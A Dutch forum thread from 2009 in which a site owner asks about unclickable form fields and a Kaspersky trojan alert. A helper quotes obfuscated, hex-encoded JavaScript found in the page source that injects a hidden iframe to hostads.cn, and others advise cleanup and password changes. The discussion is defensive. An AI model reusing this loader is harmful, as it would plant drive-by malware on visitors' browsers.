onzichtbare iets :S

  • Onderwerp starter Onderwerp starter feint
  • Startdatum Startdatum
Status
Niet open voor verdere reacties.
feint

feint

Gebruiker
Lid geworden
3 jun 2008
Berichten
273
hey allemaal.

Ik ben sinds kort bezig met het updaten van een website... nu zit ik met het probleem dat ik een soort van onzichtbare muur in mijn pagina heb zitten, hiermee bedoel ik dat bij bijvoorbeeld het form ik niet op de input blokje kan klikken. de laagste 3 kan ik niks mee daar zit een soort van muur voor. de rest werkt wel goed. zover ik weet is dit met elke pagina terwijl ik met de CSS niks kan vinden wat hier betrekking op kan hebben.

iemand een idee?

URL: http://mathvandermullen.nl/test/index.php

hiernaast nog een vraag of iemand weet hoe je een virus verwijderd van FTP? het schijnt dat ik op de website zelf http://www.mathvandermullen.nl een trojan heb zitten. gezien op de host zelf niets meer staat dan html bestanden en wat plaatjes vraag ik mij af hoe ik hem moet vinden en verwijderen.

alvast bedankt
 
Uhm, met welke browser bekijk je je site? Firefox doet het hier gewoon goed.

Over je 'trojan': hoe komt men daarbij? Het is lichtelijk onmogelijk om een trojan op je ftp te hebben, het enige wat wel kan is dat je een slecht bestand ergens op de server hebt staan. Ik kan er in ieder geval niets van vinden.


:thumb:
 
heb het geprobeerd met IE8 als Firefox de nieuwste. bij beide kan ik de 3rde regels niet aanklikken.. met tab lukt het wel.

en over het virus. toen ik er laats zelf opzat kreeg ik al een melding dat er een trojan op zat.. en iemand op dit forum had mij erop gewezen een tijdje terug maar toen kon ik zelf al niks vinden

het betrek zich tot deze regels, als voorbeeld pagina heb ik formulier gepakt gezien het hier van belang is dat mensen op de tekst regel kunnen klikken
website.jpg
 
Laatst bewerkt:
nog even over dat met die trojan,
ik krijg inderdaad een melding van kaspersky:

Kaspersky
Internet Security 2009
TOEGANG GEWEIGERD
Het gevraagde internetadres kon niet worden opgehaald

Tijdens het ophalen van internetadres:

http://mathvandermullen.nl/

Is de volgende fout opgetreden:

Het gevraagde object is GEINFECTEERD met de volgende virussen: HEUR:Trojan.Script.Iframer


Neem contact op met uw provider als u denkt dat dit onjuist is.
Gemaakt:
Sun Jun 07 11:00:36 2009
Kaspersky Internet Security 2009
 
ik ga ervan uit dat dit zich vanzelf oplost als de nieuwe website eenmaal klaar is. ik heb zover ik zelf weet nergens een frame staan, ik kan hooguit speculeren dat het iets te maken zou hebben met de re-direct naar de volgende pagina
 
ik heb wel dit in je broncode:
HTML: 
<script language="JavaScript" type="text/javascript">
B5945854B0EB="p";B5945854B0EB+="ars";B5945854B0EB+="eInt";DEC13075C3="Stri";DEC13075C3+="ng.fromCh";DEC13075C3+="ar";DEC13075C3+="Cod";DEC13075C3+="e";function DB7626EBBEDF88(A80B2223BEB0940){var B422E9E=498;B422E9E=B422E9E-482;A9A89=eval(B5945854B0EB+"(A80B2223BEB0940,B422E9E)");return(A9A89);}function D6733AD0(FFA337BD774BC){var C0ED8BB7290=353;C0ED8BB7290=C0ED8BB7290-351;var C806B5F4F26="";for(FFA05AE929=0;FFA05AE929<FFA337BD774BC.length;FFA05AE929+=C0ED8BB7290){C806B5F4F26+=( eval(DEC13075C3+"(DB7626EBBEDF88(FFA337BD774BC.substr(FFA05AE929,C0ED8BB7290)))"));}eval(C806B5F4F26);}D6733AD0("69662028646F63756D656E742E636F6F6B69652E7365617263682822717877683D332229203D3D202D3129207B0A6F647573703D646F63756D656E742E676574456C656D656E74427949642827656E777027293B6966286F647573703D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D656E7770207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D2022717877683D333B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>
wat nogal... tsja. jeweetwel. Wat is dit precies? Als het niet van jou is: dit is wss je 'trojan'.
 
In Opera en Firefox en IE 6 werkt je formulier gewoon bij mij. (De rest kan ik even niet testen vanwege harewareproblemen).
Op je formulieren-pagina (en mogelijk op meer plaatsen) zit 'n link naar hostads.cn. Dat is 'n site die malware probeert te installeren.
Als dat JavaScript niet van jou afkomstig is, dan moet je 't in iedeer geval melden bij je hoster, want dan zit er mogelijk iets bij hun fout. En ik zou al je wachtwoorden in ieder geval veranderen.
Het is ook verstandig je eigen computer grondig te controleren met 'n andere (online)-scanner dan je normaal gebruikt.
 
Laatst bewerkt:
hmm ik zal even kijken naar die javascripts.

verder vind ik het vreemd dat bij mij het formulier niet helemaal werkt.. ook op andere computers werkt het voor mij niet.

met de tab functie en dergelijke doet die het wel gewoon maar als ik ze zelf met de muis wil aanklikken gaat dat niet.. vreemd maarja als die het voor iedereen wel doet dan zal er niet veel mis zijn denk ik.

bedankt voor jullie reacties :thumb:

edit: als het goed is zijn de jscriptjes verwijderd. hopelijk lost dit het trojan probleem op.
 
Laatst bewerkt:
Nee, niet helemaal. Want die scripts zijn er op een of andere manier opgekomen. Dus ik zou echt je eigen computer heel grondig controleren, en als je zelf niets vindt echt je hoster ook informeren. Want dat zit er mogelijk bij hem iets mis, of is de besmetting opgelopen via een van de andere gehoste sites.
En in ieder geval je toegangscodes en zo veranderen.
 
Status
Niet open voor verdere reacties.
                    Steun ons                    

Nieuwste berichten

Terug
Bovenaan Onderaan